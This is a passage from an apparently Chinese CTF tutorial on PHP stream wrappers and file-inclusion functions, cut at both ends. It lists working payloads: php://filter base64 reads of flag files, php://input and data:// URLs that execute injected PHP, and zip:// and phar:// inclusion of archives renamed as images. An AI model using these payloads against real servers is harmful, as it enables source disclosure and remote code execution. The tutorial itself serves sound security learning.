class="line"><span class="number">10</span> rar:<span class="comment">// — RAR</span></span><br><span class="line"><span class="number">11</span> ogg:<span class="comment">// — 音频流</span></span><br><span class="line"><span class="number">12</span> expect:<span class="comment">// — 处理交互式的流</span></span><br></pre></td></tr></table></figure>





<h2 id="file"><a href="#file" class="headerlink" title="file:&#x2F;&#x2F;"></a>file:&#x2F;&#x2F;</h2><p>访问本地文件系统</p>
<p><strong>条件：</strong></p>
<ul>
<li>allow_url_fopen:off&#x2F;on</li>
<li>allow_url_include :off&#x2F;on</li>
</ul>
<p><strong>作用：</strong><br>用于访问本地文件系统（服务器中的文件），在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响。</p>
<p><strong>说明：</strong><br>当指定了一个<strong>相对路径</strong>提供的路径将基于<strong>当前的目录</strong>。在很多情况下是脚本所在的目录。</p>
<p><strong>相对路径</strong></p>
<p>Windows：不以:&#x2F;&#x2F;indows 盘符开头的路径</p>
<p>Linux:不以&#x2F;开头的路径</p>
<p><strong>使用示例</strong>：以传参变量名为cmd演示</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#Linux</span></span><br><span class="line">cmd=file:<span class="comment">///path/to/flag    #根目录下path文件夹中to文件夹下flag文件 ——此处有///三条</span></span><br><span class="line">cmd=file:<span class="comment">//relative/path/flag    #当前目录下relative文件夹中path文件夹下flag文件</span></span><br><span class="line">cmd=file:<span class="comment">//flag    #当前目录下的flag文件</span></span><br><span class="line"><span class="comment">#Windows</span></span><br><span class="line">    cmd=file:<span class="comment">//C:/path/to/flag.txt #C盘中path文件夹中to文件夹下flag文件</span></span><br><span class="line">cmd=file:<span class="comment">//C:flag.txt  #C盘下flag文件</span></span><br><span class="line">cmd=file:<span class="comment">//flag.txt  #当前文件夹下flag文件</span></span><br></pre></td></tr></table></figure>



<h2 id="http"><a href="#http" class="headerlink" title="http:&#x2F;&#x2F;"></a>http:&#x2F;&#x2F;</h2><p> 访问 HTTP(s) 网址</p>
<p><strong>条件：</strong></p>
<ul>
<li>allow_url_fopen:on</li>
<li>allow_url_include:on</li>
</ul>
<p><strong>作用：</strong><br>常规 URL 形式，允许通过 HTTP 1.0 的 GET方法，以只读访问文件或资源。CTF中通常用于<strong>远程包含。</strong></p>
<p><strong>使用示例</strong>：以传参变量名为cmd演示</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cmd=http:<span class="comment">//example.com/phpinfo.txt	#读取http://example.com/phpinfo.txt文件</span></span><br><span class="line">cmd=https:<span class="comment">//example.com/file.php?var1=val1&amp;var2=val2	#读取https://example.com/file.php文件并且传入var1和var2的值</span></span><br></pre></td></tr></table></figure>



<h2 id="php"><a href="#php" class="headerlink" title="php:&#x2F;&#x2F;"></a>php:&#x2F;&#x2F;</h2><p> 访问各个输入&#x2F;输出流(I&#x2F;O streams)</p>
<p><strong>条件：</strong></p>
<ul>
<li>allow_url_fopen:off&#x2F;on</li>
<li>allow_url_include :仅<code>php://input</code> 、<code>php://stdin</code>、<code>php://memory</code>、<code>php://temp</code> 需要on</li>
</ul>
<p><strong>作用：</strong><br>php:&#x2F;&#x2F; 访问各个输入&#x2F;输出流(I&#x2F;O streams)，</p>
<p>在CTF中经常使用的是<code>php://filter</code>和<code>php://input</code>、<code>php://filter</code>用于读取源码，<code>php://input</code>用于执行php代码。</p>
<p>说明：<br>PHP 提供了一些杂项输入&#x2F;输出(IO)流，允许访问 PHP 的输入输出流、标准输入输出和错误描述符，<br>内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。</p>
<h3 id="php-filter"><a href="#php-filter" class="headerlink" title="php:&#x2F;&#x2F;filter"></a><strong>php:&#x2F;&#x2F;filter</strong></h3><p><strong>条件：</strong></p>
<ul>
<li>allow_url_fopen:off&#x2F;on</li>
<li>allow_url_include :off&#x2F;on</li>
</ul>
<p><code>php://filter</code>可以作为一个位于原始数据流和最终目标之间的中间流来处理其他流，负责对数据进行处理。（即读取或写入数据之前对其进行修改或过滤。）</p>
<table>
<thead>
<tr>
<th>名称</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>resource&#x3D;&lt;要过滤的数据流&gt;</td>
<td>这个参数是必须的。它指定了你要筛选过滤的数据流。（加绝对路径）</td>
</tr>
<tr>
<td>read&#x3D;&lt;读链的筛选列表&gt;</td>
<td>该参数可选。可以设定一个或多个过滤器名称，以管道符（&#96;</td>
</tr>
<tr>
<td>write&#x3D;&lt;写链的筛选列表&gt;</td>
<td>该参数可选。可以设定一个或多个过滤器名称，以管道符（&#96;</td>
</tr>
<tr>
<td>&lt;；两个链的筛选列表&gt;</td>
<td>任何没有以 read&#x3D; 或 write&#x3D; 作前缀 的筛选器列表会视情况应用于读或写链。</td>
</tr>
</tbody></table>
<p><strong>注：<code>read</code> 和 <code>write</code> 指令是互斥的，不能同时使用。</strong></p>
<p><code>write</code>指令用于<code>file_put_contents()</code>、<code>fopen()</code> 、 <code>fwrite()</code>等可指定文件名的地方，对这个文件进行写入后再编码处理</p>
<h4 id="过滤器"><a href="#过滤器" class="headerlink" title="过滤器"></a><strong>过滤器</strong></h4><h5 id="字符串过滤器"><a href="#字符串过滤器" class="headerlink" title="字符串过滤器"></a><strong>字符串过滤器</strong></h5><p>​				<strong>No.1   <code>string.rot13</code></strong></p>
<p>​	<code>str_rot13</code>（自 PHP 4.3.0 起等同于用 str_rot13()函数处理所有的流数据）—对字符串执行ROT13转换. ROT13 是一种简单的替换密码，将字母表中的每个字母向后移动13个位置,同时忽略非字母表中的字符。这意味着对一个字符进行 ROT13 编码两次会得到原始字符。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$string</span> = <span class="string">&quot;Hello, World!&quot;</span>;</span><br><span class="line"><span class="variable">$encoded</span> = <span class="title function_ invoke__">str_rot13</span>(<span class="variable">$string</span>);</span><br><span class="line"><span class="variable">$decoded</span> = <span class="title function_ invoke__">str_rot13</span>(<span class="variable">$encoded</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$encoded</span>; <span class="comment">// 输出 &quot;Uryyb, Jbeyq!&quot;</span></span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$decoded</span>; <span class="comment">// 输出 &quot;Hello, World!&quot;</span></span><br></pre></td></tr></table></figure>



<p>​				<strong>No.2   <code>string.toupper</code></strong></p>
<p>​	<code>string.toupper</code>（自 PHP 5.0.0 起等同于用 <code>strtoupper()</code>函数处理所有的流数据）使用此过滤器,将字符串转化为大写</p>
<p>​				<strong>No.3   <code>string.tolower</code></strong></p>
<p>​	<code>string.tolower</code>（自 PHP 5.0.0 起等同于用 <code>strtolower()</code>函数处理所有的流数据）使用此过滤器,将字符串转化为小写</p>
<p>​				<strong>No.4   <code>string.strip_tags</code></strong>(自 PHP 7.3.0 起废弃)<br>​	 <code>string.strip_tags</code>使用此过滤器等同于用 <code>strip_tags()</code>函数处理所有的流数据。可以用两种格式接收参数：一种是和strip_tags()函数第二个参数相似的一个包含有标记列表的字符串，一种是一个包含有标记名的数组。从字符串中去除 HTML 和 PHP 标记.该函数尝试返回给定的字符串str去除空字符、HTML 和 PHP 标记后的结果。与<code>strip_tags()</code>函数该过滤器会<strong>完全去除所有的 HTML 和 PHP 标签</strong>，无法通过参数来指定允许保留的标签。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$html</span> = <span class="string">&quot;&lt;p&gt;Hello, &lt;b&gt;World!&lt;/b&gt;&lt;/p&gt;&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$filtered</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&#x27;php://filter/string.strip_tags/resource=data:text/plain,&#x27;</span> . <span class="title function_ invoke__">urlencode</span>(<span class="variable">$html</span>));<span class="comment">#进行编码防止乱码出现</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$filtered</span>; <span class="comment">// 输出 &quot;Hello, World!&quot;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h5 id="转换过滤器"><a href="#转换过滤器" class="headerlink" title="转换过滤器"></a><strong>转换过滤器</strong></h5><p>注：转换过滤器是 PHP 5.0.0 添加的</p>
<p>​				<strong>No.1   <code>convert.base64</code></strong></p>
<p>​	<code>convert.base64-encode</code>和 <code>convert.base64-decode</code>使用这两个过滤器等同于分别用<code>base64_encode()</code>和<code>base64_decode()</code>函数处理所有的流数据(采用<code>base64</code>加密)。<code>convert.base64-encode</code>支持以一个关联数组给出的参数。如果给出了<code>line-length</code>，<code>base64</code> 输出将被用<code>line-length</code>个字符为 长度而截成块。如果给出了<code>line-break-chars</code>，每块将被用给出的字符隔开。这些参数的效果和用<code>base64_encode()</code>再加上 <code>chunk_split()</code>相同。</p>
<p>​				<strong>No.2   <code>convert.quoted</code></strong></p>
<p>​	<code>convert.quoted-printable-decode</code>等同于用 <code>quoted_printable_decode()</code>函数处理所有的流数据。但没有和<code>convert.quoted-printable-encode</code>相对应的函数。<code>convert.quoted-printable-encode</code>支持以一个关联数组给出的参数。除了支持和<code>convert.base64-encode</code>一样的附加参数外，<code>convert.quoted-printable-encode</code>还支持布尔参数<code>binary</code>和 <code>force-encode-first</code>。<code>convert.base64-decode</code>只支持<code>line-break-chars</code>参数作为从编码载荷中剥离的类型提示。</p>
<p>​				<strong>No.3   <code>convert.iconv.*</code></strong></p>
<p>​	使用<code>convert.iconv.*</code>过滤器（php支持 <code>iconv</code> ，而iconv是默认编译并启用）等同于用<code>iconv()</code>函数处理所有的流数据，将字符串按要求的字符编码来转换</p>
<p><code>convery.iconv.*</code>的使用有两种方法:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">convert.iconv.&lt;input-encoding&gt;.&lt;output-encoding&gt;  <span class="comment">#&lt;input-encoding&gt;-传入的编码格式</span></span><br><span class="line"><span class="comment">#or </span></span><br><span class="line">convert.iconv.&lt;input-encoding&gt;/&lt;output-encoding&gt;  <span class="comment">#&lt;output-encoding&gt;-传出的编码格式</span></span><br></pre></td></tr></table></figure>


<p>支持的字符编码有一下几种（详细参考官方手册）</p>
<blockquote>
<p>UCS-4* | UCS-4BE  | UCS-4LE*  | UCS-2  | UCS-2BE  | UCS-2LE  | UTF-32*  | UTF-32BE*  | UTF-32LE*  | UTF-16*  | UTF-16BE*  | UTF-16LE*  | UTF-7  | UTF7-IMAP  | UTF-8*  | ASCII*  | </p>
</blockquote>
<p>​		<strong>压缩过滤器</strong></p>
<p>​	虽然 压缩封装协议 提供了在本地文件系统中 创建 gzip 和 bz2 兼容文件的方法，但不代表可以在网络的流中提供通用压缩的意思，也不代表可以将一个非压缩的流转换成一个压缩流。对此，压缩过滤器可以在任何时候应用于任何流资源。</p>
<p>​	<code>zlib.deflate</code>（压缩）和 <code>zlib.inflate</code>（解压）实现了定义与 <a target="_blank" rel="noopener" href="http://www.faqs.org/rfcs/rfc1951">» RFC 1951</a> 的压缩算法。 <code>deflate</code> 过滤器可以接受以一个关联数组传递的最多三个参数。 <code>level</code>定义了压缩强度（1-9）。 数字更高通常会产生更小的载荷，但要消耗更多的处理时间。 存在两个特殊压缩等级：0（完全不压缩）和 -1（zlib 内部默认值，目前是 6）。 <code>window</code>是压缩回溯窗口大小，以二的次方表示。 更高的值（大到 15 —— 32768 字节）产生更好的压缩效果但消耗更多内存， 低的值（低到 9 —— 512 字节）产生产生较差的压缩效果但内存消耗低。 目前默认的 <code>window</code> 大小是 **<code>15</code>**。 <code>memory</code>用来指示要分配多少工作内存。 合法的数值范围是从 1（最小分配）到 9（最大分配）。 内存分配仅影响速度，不会影响生成的载荷的大小。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Note: 压缩过滤器 不产生命令行工具如 gzip的头和尾信息。只是压缩和解压数据流中的有效载荷部分。 </span><br><span class="line"></span><br><span class="line">zlib.* 压缩过滤器自 PHP 版本 5.1.0起可用，在激活 zlib的前提下。也可以通过安装来自 » PECL的 » zlib_filter包作为一个后门在 5.0.x版中使用。此过滤器在 PHP 4 中 不可用。</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=compress.zlib://flag.php</span><br></pre></td></tr></table></figure>

<p>​		</p>
<p>​		<strong>加密过滤器</strong>（已自 PHP 7.1.0 起废弃）</p>
<p>​	<code>mcrypt.</code>和 <code>mdecrypt.</code>使用<code>libmcrypt</code>提供了对称的加密和解密。这两组过滤器都支持mcrypt扩展库中相同的算法，格式为 <code>mcrypt.ciphername</code>，其中<code>ciphername</code>是密码的名字，将被传递给<code>mcrypt_module_open()</code>。有以下五个过滤器参数可用：</p>
<table>
<thead>
<tr>
<th align="left">参数</th>
<th align="left">是否必须</th>
<th align="left">默认值</th>
<th align="left">取值举例</th>
</tr>
</thead>
<tbody><tr>
<td align="left">mode</td>
<td align="left">可选</td>
<td align="left">cbc</td>
<td align="left">cbc、cfb、ecb、nofb、ofb、stream</td>
</tr>
<tr>
<td align="left">algorithms_dir</td>
<td align="left">可选</td>
<td align="left">ini_get(‘mcrypt.algorithms_dir’)</td>
<td align="left">algorithms 模块的目录</td>
</tr>
<tr>
<td align="left">modes_dir</td>
<td align="left">可选</td>
<td align="left">ini_get(‘mcrypt.modes_dir’)</td>
<td align="left">modes 模块的目录</td>
</tr>
<tr>
<td align="left">iv</td>
<td align="left">必须</td>
<td align="left">N&#x2F;A</td>
<td align="left">典型为 8、16 或 32 字节的二进制数据。根据密码而定</td>
</tr>
<tr>
<td align="left">key</td>
<td align="left">必须</td>
<td align="left">N&#x2F;A</td>
<td align="left">典型为 8、16 或 32 字节的二进制数据。根据密码而定</td>
</tr>
</tbody></table>
<h5 id="总结："><a href="#总结：" class="headerlink" title="总结："></a>总结：</h5><p>CTF常用的语句</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cmd=php:<span class="comment">//filter/read=convert.base64-encode/resource=/flag</span></span><br></pre></td></tr></table></figure>





<h3 id="php-input"><a href="#php-input" class="headerlink" title="php:&#x2F;&#x2F;input"></a>php:&#x2F;&#x2F;input</h3><p>主要用来接收post数据，将post请求中的数据作为php代码执行。</p>
<p><strong>条件：</strong></p>
<ul>
<li>allow_url_fopen:off&#x2F;on</li>
<li>allow_url_include :on</li>
</ul>
<p><strong>使用示例</strong>：以传参变量名为cmd演示</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//127.0.0.1/include.php?file=php://input</span></span><br><span class="line">[POST DATA部分]<span class="comment">#这一行不需要放入post中</span></span><br><span class="line"><span class="meta">&lt;?php</span> <span class="title function_ invoke__">phpinfo</span>(); <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<h2 id="zlib"><a href="#zlib" class="headerlink" title="zlib:&#x2F;&#x2F;"></a>zlib:&#x2F;&#x2F;</h2><p> 压缩流</p>
<p><strong>条件</strong></p>
<ul>
<li>allow_url_fopen:off&#x2F;on</li>
<li>allow_url_include :off&#x2F;on</li>
</ul>
<p><strong>作用</strong></p>
<p>​	zip:&#x2F;&#x2F; &amp; bzip2:&#x2F;&#x2F; &amp; zlib:&#x2F;&#x2F; 均属于压缩流，可以访问压缩文件中的子文件，更重要的是不需要指定后缀名，可修改为任意后缀：jpg png gif xxx 等等。</p>
<p><strong>注</strong>：<code>zlib://</code> 需要是服务器内的压缩包文件、但不局限于后缀名</p>
<p><strong>示例：</strong></p>
<p>1、 zip:&#x2F;&#x2F;[压缩文件绝对路径]#[压缩文件内的子文件名](#编码为%23)</p>
<p>压缩 phpinfo.txt 为 phpinfo.zip ，压缩包重命名为 phpinfo.jpg ，并上传</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/include.php?file=zip:///var/www/html/phpinfo.jpg#phpinfo.txt</span><br></pre></td></tr></table></figure>

<p>2、compress.bzip2:&#x2F;&#x2F;file.bz2<br>压缩 phpinfo.txt 为 phpinfo.bz2 并上传(同样支持任意后缀名)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/include.php?file=compress.bzip2:///var/www/html/phpinfo.bz2</span><br></pre></td></tr></table></figure>

<p>3、compress.zlib:&#x2F;&#x2F;file.gz<br>压缩 phpinfo.txt 为 phpinfo.gz 并上传(同样支持任意后缀名)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/include.php?file=compress.zlib:///var/www/html/phpinfo.gz</span><br></pre></td></tr></table></figure>



<h2 id="phar"><a href="#phar" class="headerlink" title="phar:&#x2F;&#x2F;"></a>phar:&#x2F;&#x2F;</h2><p>phar:&#x2F;&#x2F;协议与zip:&#x2F;&#x2F;类似，同样可以访问zip格式压缩包内容</p>
<p>例如</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/include.php?file=phar:///var/www/html/phpinfo.zip/phpinfo.txt</span><br></pre></td></tr></table></figure>



<h2 id="data"><a href="#data" class="headerlink" title="data:&#x2F;&#x2F;"></a>data:&#x2F;&#x2F;</h2><p><strong>条件</strong></p>
<ul>
<li>allow_url_fopen:on</li>
<li>allow_url_include :on</li>
</ul>
<p><strong>作用</strong><br>自PHP&gt;&#x3D;5.2.0起，可以使用data:&#x2F;&#x2F;数据流封装器，以传递相应格式的数据。<strong>通常可以用来执行PHP代码。</strong></p>
<p><strong>用法</strong></p>
<ul>
<li><code>data://text/plain,[加上所需传输的经过url编码数据]</code></li>
<li><code>data://text/plain;base64,[加上所需传输的经过base64编码再经过url编码的数据]</code></li>
</ul>
<p>传入时不要加上<code>[ ]</code></p>
<p><strong>示例</strong>：</p>
<ul>
<li>data:&#x2F;&#x2F;text&#x2F;plain,</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//127.0.0.1/include.php?file=data://text/plain,&lt;?php%20phpinfo();?&gt;</span></span><br></pre></td></tr></table></figure>

<ul>
<li>data:&#x2F;&#x2F;text&#x2F;plain;base64,</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b</span></span><br></pre></td></tr></table></figure>



<h1 id="使用场景"><a href="#使用场景" class="headerlink" title="使用场景"></a><strong>使用场景</strong></h1><p>当遇到文件包含可使用伪协议进行</p>
<p>可能遇到的文件包含函数：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">1、include</span><br><span class="line">2、require</span><br><span class="line">3、include_once</span><br><span class="line">4、require_once</span><br><span class="line">5、highlight_file</span><br><span class="line">6、show_source</span><br><span class="line">7、flie</span><br><span class="line">8、readfile</span><br><span class="line">9、file_get_contents </span><br><span class="line">10、file_put_contents</span><br><span class="line">11、fopen (比较常见)</span><br></pre></td></tr></table></figure>



<h2 id="include和require函数"><a href="#include和require函数" class="headerlink" title="include和require函数"></a>include和require函数</h2><p>​	通过 include 或 require 语句，可以将 <strong>PHP 文件</strong>的内容插入另一个 PHP 文件(<strong>在服务器执行它之前</strong>)。</p>
<p><code>include</code> 和 <code>require</code> 语句是相同的，<strong>除了错误处理方面</strong>：</p>
<p><code>require</code> 会生成致命错误(E_COMPILE_ERROR)并停止脚本、<code>include</code> 只生成警告(E_WARNING)，并且脚本会继续</p>
<p><strong>语法：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span> <span class="string">&#x27;filename&#x27;</span>;</span><br><span class="line"><span class="keyword">require</span> <span class="string">&#x27;filename&#x27;</span>;</span><br></pre></td></tr></table></figure>

<p><strong>区别：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">  include &#x27;23333.php&#x27;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>由于23333.php不存在<br>使用include的时候，只会在当前语句报错，然后执行后边的正常语句</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">  <span class="keyword">require</span> <span class="string">&#x27;23333.php&#x27;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>但是使用require的时候，就会直接报错然后跳出函数。</p>
<h2 id="include-once和require-once函数"><a href="#include-once和require-once函数" class="headerlink" title="include_once和require_once函数"></a>include_once和require_once函数</h2><p>​	<code>include_once</code> (<code>require_once</code>)语句在脚本执行期间包含并运行指定文件。此行为和 <code>include (require)</code>语句类似，区别是如果该文件中的代码已经被包含了，则不会再次包含，只会包含一次。include_once(require_once)需要查询一遍已加载的文件列表, 确认是否存在, 然后再加载。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">require</span> <span class="string">&#x27;1.php&#x27;</span>;</span><br><span class="line"><span class="keyword">require</span> <span class="string">&#x27;1.php&#x27;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这种情况下1.php被包含两次。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">require</span> <span class="string">&#x27;1.php&#x27;</span>;</span><br><span class="line"><span class="keyword">require_once</span> <span class="string">&#x27;1.php&#x27;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这种情况下，第二次包含时，是不会进行包含的。</p>
<h2 id="highlight-file-和show-source"><a href="#highlight-file-和show-source" class="headerlink" title="highlight_file()和show_source()"></a>highlight_file()和show_source()</h2><p>两个函数的用法相同，因为show_source()是highlight_file()的别名</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">show_source</span>(filename,<span class="keyword">return</span>);</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(filename,<span class="keyword">return</span>);</span><br></pre></td></tr></table></figure>

<p>其中return是可选项</p>
<table>
<thead>
<tr>
<th>参数</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>filename</td>
<td>必需。要进行高亮处理的 PHP 文件的路径。</td>
</tr>
<tr>
<td>return</td>
<td>可选。如果设置 true，则本函数返回高亮处理的代码，而不是输出它们。</td>
</tr>
</tbody></table>
<p>​	<br>​	</p>
<h2 id="readfile和file-get-contents和file"><a href="#readfile和file-get-contents和file" class="headerlink" title="readfile和file_get_contents和file"></a>readfile和file_get_contents和file</h2><p>三者区别：</p>
<table>
<thead>
<tr>
<th align="center">名称</th>
<th align="center">作用</th>
</tr>
</thead>
<tbody><tr>
<td align="center">file</td>
<td align="center">把整个文件读入一个数组中</td>
</tr>
<tr>
<td align="center">readfile</td>
<td align="center">读入一个文件并写入到输出缓冲。</td>
</tr>
<tr>
<td align="center">file_get_contents</td>
<td align="center">将整个文件读入一个字符串</td>
</tr>
</tbody></table>
<p>注：以下提到的<strong>PHP 的内置路径（include_path）</strong>为在<code>php.ini</code>的php配置文件中进行设置的搜索路径。</p>
<h3 id="file-get-contents"><a href="#file-get-contents" class="headerlink" title="file_get_contents"></a><strong>file_get_contents</strong></h3><p>file_get_contents() 把整个文件读入一个字符串中。<br>该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持，还会使用内存映射技术来增强性能。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">file_get_contents</span>(path,include_path,context,start,max_length)</span><br></pre></td></tr></table></figure>

<table>
<thead>
<tr>
<th>参数</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>path</td>
<td>必需。规定要读取的文件。</td>
</tr>
<tr>
<td>include_path</td>
<td>可选。只提供了文件名，而没有提供完整的文件路径，将在PHP 的内置路径（include_path）中搜索文件。如果您还想在 include_path(在 php.ini 中)中搜索文件的话，请设置该参数为 ‘1’。</td>
</tr>
<tr>
<td>context</td>
<td>可选。规定文件句柄的环境（即执行的条件）。context 是一套可以修改流的行为的选项。若使用 NULL，则忽略。</td>
</tr>
<tr>
<td>start</td>
<td>可选。规定在文件中开始读取的位置。该参数是 PHP 5.1 中新增的。</td>
</tr>
<tr>
<td>max_length</td>
<td>可选。规定读取的字节数。该参数是 PHP 5.1 中新增的。</td>
</tr>
</tbody></table>
<h3 id="readfile"><a href="#readfile" class="headerlink" title="readfile"></a><strong>readfile</strong></h3><p>readfile() 函数读取一个文件，并写入到输出缓冲。如果成功，该函数返回从文件中读入的字节数。如果失败，该函数返回 FALSE 并附带错误信息。您可以通过在函数名前面添加一个 ‘@’ 来隐藏错误输出。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">readfile</span>(filename,include_path,context)</span><br></pre></td></tr></table></figure>

<table>
<thead>
<tr>
<th>参数</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>filename</td>
<td>必需。规定要读取的文件。</td>
</tr>
<tr>
<td>include_path</td>
<td>可选。只提供了文件名，而没有提供完整的文件路径，将在PHP 的内置路径（include_path）中搜索文件。如果您还想在 include_path(在 php.ini 中)中搜索文件的话，请设置该参数为 ‘1’。</td>
</tr>
<tr>
<td>context</td>
<td>可选。规定文件句柄的环境（即执行的条件）。context 是一套可以修改流的行为的选项。</td>
</tr>
</tbody></table>
<h3 id="file-1"><a href="#file-1" class="headerlink" title="file"></a><strong>file</strong></h3><p>与 file_get_contents() 类似，不同的是 file() 将文件读取后作为一个数组返回。数组中的每个单元都是文件中相应的一行，包括换行符在内。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">file</span>(path,include_path,context)</span><br></pre></td></tr></table></figure>

<table>
<thead>
<tr>
<th>参数</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>path</td>
<td>必需。规定要读取的文件</td>
</tr>
<tr>
<td>include_path</td>
<td>可选。只提供了文件名，而没有提供完整的文件路径，将在PHP 的内置路径（include_path）中搜索文件。如果也想在 include_path 中搜寻文件的话，可以将该参数设为 “1”</td>
</tr>
<tr>
<td>context</td>
<td>可选。规定文件句柄的环境（即执行的条件）。context 是一套可以修改流的行为的选项。若使用 null，则忽略。</td>
</tr>
</tbody></table>
<h2 id="file-put-contents"><a href="#file-put-contents" class="headerlink" title="file_put_contents"></a>file_put_contents</h2><p><code>file_put_contents()</code> 函数把一个字符串写入文件中。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> <span class="title function_ invoke__">file_put_contents</span> ( <span class="keyword">string</span> <span class="variable">$filename</span> , <span class="keyword">mixed</span> <span class="variable">$data</span> [, <span class="keyword">int</span> <span class="variable">$flags</span> = <span class="number">0</span> [, resource <span class="variable">$context</span> ]] )</span><br></pre></td></tr></table></figure>

<table>
<thead>
<tr>
<th align="center">参数</th>
<th align="left">功能</th>
</tr>
</thead>
<tbody><tr>
<td align="center">filename</td>
<td align="left">必需。规定要写入数据的文件。如果文件不存在，则创建一个新文件</td>
</tr>
<tr>
<td align="center">data</td>
<td align="left">必需。规定要写入文件的数据。可以是字符串、数组或数据流</td>
</tr>
<tr>
<td align="center">flag</td>
